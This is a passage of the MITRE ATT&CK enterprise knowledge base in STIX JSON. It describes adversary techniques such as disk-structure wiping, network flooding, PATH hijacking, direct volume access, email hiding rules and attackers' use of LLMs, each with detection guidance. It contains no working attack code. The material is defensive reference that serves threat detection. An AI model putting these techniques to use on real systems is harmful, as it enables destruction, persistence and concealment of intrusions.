Advisory SNMP v3 Authentication Vulnerabilities)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Network"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--0ad7bc5c-235a-4048-944b-3b286676cb74", "created": "2020-10-19T23:46:13.931Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1602", "external_id": "T1602"}, {"source_name": "Cisco Advisory SNMP v3 Authentication Vulnerabilities", "description": "Cisco. (2008, June 10). Identifying and Mitigating Exploitation of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October 19, 2020.", "url": "https://tools.cisco.com/security/center/content/CiscoAppliedMitigationBulletin/cisco-amb-20080610-SNMPv3"}, {"source_name": "US-CERT TA17-156A SNMP Abuse 2017", "description": "US-CERT. (2017, June 5). Reducing the Risk of SNMP Abuse. Retrieved October 19, 2020.", "url": "https://us-cert.cisa.gov/ncas/alerts/TA17-156A"}, {"source_name": "US-CERT-TA18-106A", "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Disk Structure Wipe", "description": "Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources. \n\nAdversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) if all sectors of a disk are wiped.\n\nOn a network devices, adversaries may reformat the file system using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `format`.(Citation: format_cmd_cisco)\n\nTo maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Austin Clark, @c2defense"], "x_mitre_deprecated": false, "x_mitre_detection": "Look for attempts to read/write to sensitive locations like the master boot record and the disk partition table. Monitor for direct access read/write attempts using the \\\\\\\\.\\\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.\n\nFor network infrastructure devices, collect AAA logging to monitor for `format` commands being run to erase the file structure and prevent recovery of the device.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_impact_type": ["Availability"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--0af0ca99-357d-4ba1-805f-674fdfb7bef9", "created": "2020-02-20T22:10:20.484Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1561/002", "external_id": "T1561.002"}, {"source_name": "format_cmd_cisco", "description": "Cisco. (2022, August 16). format - Cisco IOS Configuration Fundamentals Command Reference. Retrieved July 13, 2022.", "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/F_through_K.html#wp2829794668"}, {"source_name": "Unit 42 Shamoon3 2018", "description": "Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019.", "url": "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/"}, {"source_name": "Palo Alto Shamoon Nov 2016", "description": "Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.", "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/"}, {"source_name": "FireEye Shamoon Nov 2016", "description": "FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved January 11, 2017.", "url": "https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html"}, {"source_name": "Kaspersky StoneDrill 2017", "description": "Kaspersky Lab. (2017, March 7). From Shamoon to StoneDrill: Wipers attacking Saudi organizations and beyond. Retrieved March 14, 2019.", "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf"}, {"source_name": "Microsoft Sysmon v6 May 2017", "description": "Russinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved December 13, 2017.", "url": "https://docs.microsoft.com/sysinternals/downloads/sysmon"}, {"source_name": "Symantec Shamoon 2012", "description": "Symantec. (2012, August 16). The Shamoon Attacks. Retrieved March 14, 2019.", "url": "https://www.symantec.com/connect/blogs/shamoon-attacks"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Direct Network Flood", "description": "Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.\n\nBotnets are commonly used to conduct network flooding attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global Internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for distributed DoS (DDoS), so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS flooding attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Detection of a network flood can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect a network flood event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Azure AD", "Office 365", "SaaS", "IaaS", "Linux", "macOS", "Google Workspace"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "x_mitre_impact_type": ["Availability"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--0bda01d5-4c1d-4062-8ee2-6872334383c3", "created": "2020-03-02T20:07:18.651Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1498/001", "external_id": "T1498.001"}, {"source_name": "Cisco DoSdetectNetflow", "description": "Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019.", "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf"}, {"source_name": "USNYAG IranianBotnet March 2016", "description": "Preet Bharara, US Attorney. (2016, March 24). Retrieved April 23, 2019.", "url": "https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Stored Data Manipulation", "description": "Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making. \n\nStored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_impact_type": ["Integrity"], "x_mitre_permissions_required": ["User", "Administrator", "root", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--0bf78622-e8d2-41da-a857-731472d61a92", "created": "2019-04-09T11:51:30.942Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1492", "external_id": "T1492"}, {"source_name": "FireEye APT38 Oct 2018", "description": "FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.", "url": "https://content.fireeye.com/apt/rpt-apt38"}, {"source_name": "DOJ Lazarus Sony 2018", "description": "Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.", "url": "https://www.justice.gov/opa/press-release/file/1092091/download"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2023-10-03T03:29:57.078Z", "name": "Path Interception by PATH Environment Variable", "description": "Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. The PATH environment variable contains a list of directories (User and System) that the OS searches sequentially through in search of the binary that was called from a script or the command line. \n\nAdversaries can place a malicious program in an earlier entry in the list of directories stored in the PATH environment variable, resulting in the operating system executing the malicious binary rather than the legitimate binary when it searches sequentially through that PATH listing.\n\nFor example, on Windows if an adversary places a malicious program named \"net.exe\" in `C:\\example path`, which by default precedes `C:\\Windows\\system32\\net.exe` in the PATH environment variable, when \"net\" is executed from the command-line the `C:\\example path` will be called instead of the system's legitimate executable at `C:\\Windows\\system32\\net.exe`. Some methods of executing a program rely on the PATH environment variable to determine the locations that are searched when the path for the program is not given, such as executing programs from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: ExpressVPN PATH env Windows 2021)\n\nAdversaries may also directly modify the $PATH variable specifying the directories to be searched. An adversary can modify the `$PATH` variable to point to a directory they have write access. When a program using the $PATH variable is called, the OS searches the specified directory and executes the malicious binary. On macOS, this can also be performed through modifying the $HOME variable. These variables can be modified using the command-line, launchctl, [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or modifying the `/etc/paths.d` folder contents.(Citation: uptycs Fake POC linux malware 2023)(Citation: nixCraft macOS PATH variables)(Citation: Elastic Rules macOS launchctl 2022)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Stefan Kanthak"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as \"findstr,\" \"net,\" and \"python\"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.\n\nData and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "macOS", "Linux"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Application Control"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32", "created": "2020-03-13T14:10:43.424Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1574/007", "external_id": "T1574.007"}, {"source_name": "Elastic Rules macOS launchctl 2022", "description": "Elastic Security 7.17. (2022, February 1). Modification of Environment Variable via Launchctl. Retrieved September 28, 2023.", "url": "https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-4-modification-of-environment-variable-via-launchctl.html"}, {"source_name": "ExpressVPN PATH env Windows 2021", "description": "ExpressVPN Security Team. (2021, November 16). Cybersecurity lessons: A PATH vulnerability in Windows. Retrieved September 28, 2023.", "url": "https://www.expressvpn.com/blog/cybersecurity-lessons-a-path-vulnerability-in-windows/"}, {"source_name": "uptycs Fake POC linux malware 2023", "description": "Nischay Hegde and Siddartha Malladi. (2023, July 12). PoC Exploit: Fake Proof of Concept with Backdoor Malware. Retrieved September 28, 2023.", "url": "https://www.uptycs.com/blog/new-poc-exploit-backdoor-malware"}, {"source_name": "nixCraft macOS PATH variables", "description": "Vivek Gite. (2023, August 22). MacOS \u2013 Set / Change $PATH Variable Command. Retrieved September 28, 2023.", "url": "https://www.cyberciti.biz/faq/appleosx-bash-unix-change-set-path-environment-variable/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Sharepoint", "description": "Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging). As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Office 365"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a", "created": "2020-02-14T13:35:32.938Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1213/002", "external_id": "T1213.002"}, {"source_name": "Microsoft SharePoint Logging", "description": "Microsoft. (2017, July 19). Configure audit settings for a site collection. Retrieved April 4, 2018.", "url": "https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-04-16T12:25:24.480Z", "name": "Direct Volume Access", "description": "Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)\n\nUtilities, such as `NinjaCopy`, exist to perform these actions in PowerShell.(Citation: Github PowerSploit Ninjacopy) Adversaries may also use built-in or third-party utilities (such as `vssadmin`, `wbadmin`, and [esentutl](https://attack.mitre.org/software/S0404)) to create shadow copies or backups of data from system volumes.(Citation: LOLBAS Esentutl)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Tom Simpson, CrowdStrike Falcon OverWatch"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor handle opens on drive volumes that are made by processes to determine when they may directly access logical drives. (Citation: Github PowerSploit Ninjacopy)\n\nMonitor processes and command-line arguments for actions that could be taken to copy files from the logical drive and evade common file system protections. Since this technique may also be used through [PowerShell](https://attack.mitre.org/techniques/T1059/001), additional logging of PowerShell scripts is recommended.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Network"], "x_mitre_version": "2.2", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["File monitoring", "File system access controls"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--0c8ab3eb-df48-4b9c-ace7-beacaac81cc5", "created": "2017-05-31T21:30:20.934Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1006", "external_id": "T1006"}, {"source_name": "Github PowerSploit Ninjacopy", "description": "Bialek, J. (2015, December 16). Invoke-NinjaCopy.ps1. Retrieved June 2, 2016.", "url": "https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1"}, {"source_name": "Hakobyan 2009", "description": "Hakobyan, A. (2009, January 8). FDump - Dumping File Sectors Directly from Disk using Logical Offsets. Retrieved November 12, 2014.", "url": "http://www.codeproject.com/Articles/32169/FDump-Dumping-File-Sectors-Directly-from-Disk-usin"}, {"source_name": "LOLBAS Esentutl", "description": "LOLBAS. (n.d.). Esentutl.exe. Retrieved September 3, 2019.", "url": "https://lolbas-project.github.io/lolbas/Binaries/Esentutl/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "File System Permissions Weakness", "description": "Processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.\n\nAdversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.\n\n### Services\n\nManipulation of Windows service binaries is one variation of this technique. Adversaries may replace a legitimate service executable with their own executable to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService). Once the service is started, either directly by the user (if appropriate access is available) or through some other means, such as a system restart if the service starts on bootup, the replaced executable will run instead of the original service executable.\n\n### Executable Installers\n\nAnother variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038). Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088). Several examples of this weakness in existing common installers have been reported to software vendors. (Citation: Mozilla Firefox Installer DLL Hijack) (Citation: Seclists Kanthak 7zip Installer)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Stefan Kanthak", "Travis Smith, Tripwire"], "x_mitre_detection": "Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.\n\nLook for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Linux", "macOS"], "x_mitre_version": "1.1", "x_mitre_effective_permissions": ["SYSTEM", "User", "Administrator"], "x_mitre_permissions_required": ["Administrator", "User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--0ca7beef-9bbc-4e35-97cf-437384ddce6a", "created": "2017-05-31T21:30:43.063Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1044", "external_id": "T1044"}, {"source_name": "capec", "url": "https://capec.mitre.org/data/definitions/17.html", "external_id": "CAPEC-17"}, {"source_name": "Mozilla Firefox Installer DLL Hijack", "description": "Kugler, R. (2012, November 20). Mozilla Foundation Security Advisory 2012-98. Retrieved March 10, 2017.", "url": "https://www.mozilla.org/en-US/security/advisories/mfsa2012-98/"}, {"source_name": "Seclists Kanthak 7zip Installer", "description": "Kanthak, S. (2015, December 8). Executable installers are vulnerable^WEVIL (case 7): 7z*.exe\tallows remote code execution with escalation of privilege. Retrieved March 10, 2017.", "url": "http://seclists.org/fulldisclosure/2015/Dec/34"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2024-04-15T23:49:14.558Z", "name": "Artificial Intelligence", "description": "Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)\n\nFor example, by utilizing a publicly available LLM an adversary is essentially outsourcing or automating certain tasks to the tool. Using AI, the adversary may draft and generate content in a variety of written languages to be used in [Phishing](https://attack.mitre.org/techniques/T1566)/[Phishing for Information](https://attack.mitre.org/techniques/T1598) campaigns. The same publicly available tool may further enable vulnerability or other offensive research supporting [Develop Capabilities](https://attack.mitre.org/techniques/T1587). AI tools may also automate technical tasks by generating, refining, or otherwise enhancing (e.g., [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)) malicious scripts and payloads.(Citation: OpenAI-CTI)\n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--0cc222f5-c3ff-48e6-9f52-3314baf9d37e", "created": "2024-03-11T13:37:31.836Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1588/007", "external_id": "T1588.007"}, {"source_name": "MSFT-AI", "description": "Microsoft Threat Intelligence. (2024, February 14). Staying ahead of threat actors in the age of AI. Retrieved March 11, 2024.", "url": "https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/"}, {"source_name": "OpenAI-CTI", "description": "OpenAI. (2024, February 14). Disrupting malicious uses of AI by state-affiliated threat actors. Retrieved March 11, 2024.", "url": "https://openai.com/blog/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2023-10-16T16:41:53.957Z", "name": "Email Hiding Rules", "description": "Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule or Set-InboxRule [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)\n\nAdversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) emails sent from the compromised account.\n\nAny user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as malware, suspicious, phish, and hack) found in message bodies and subject lines. (Citation: Microsoft Cloud App Security)\n\nIn some environments, administrators may be able to enable email rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.(Citation: Microsoft Mail Flow Rules 2023) Adversaries that abuse such features may be able to automatically modify or delete all emails related to specific topics (such as internal security incident notifications).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Dor Edry, Microsoft", "Liran Ravich, CardinalOps"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor email clients and applications for suspicious activity, such as missing messages or abnormal configuration and/or log entries.\n\nOn Windows systems, monitor for creation of suspicious inbox rules through the use of the New-InboxRule and Set-InboxRule PowerShell cmdlets.(Citation: Microsoft BEC Campaign) On MacOS systems, monitor for modifications to the RulesActiveState.plist, SyncedRules.plist, UnsyncedRules.plist, and MessageRules.plist files.(Citation: MacOS Email Rules)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Office 365", "Linux", "macOS", "Google Workspace"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--0cf55441-b176-4332-89e7-2c4c7799d0ff", "created": "2021-06-07T13:20:23.767Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1564/008", "external_id": "T1564.008"}, {"source_name": "MacOS Email Rules", "description": "Apple. (n.d.). Use rules to manage emails you receive in Mail on Mac. Retrieved June 14, 2021.", "url": "https://support.apple.com/guide/mail/use-rules-to-manage-emails-you-receive-mlhlp1017/mac"}, {"source_name": "Microsoft BEC Campaign", "description": "Carr, N., Sellmer, S. (2021, June 14). Behind the scenes of business email compromise: Using cross-domain threat data to disrupt a large BEC campaign. Retrieved June 15, 2021.", "url": "https://www.microsoft.com/security/blog/2021/06/14/behind-the-scenes-of-business-email-compromise-using-cross-domain-threat-data-to-disrupt-a-large-bec-infrastructure/"}, {"source_name": "Microsoft Mail Flow Rules 2023", "description": 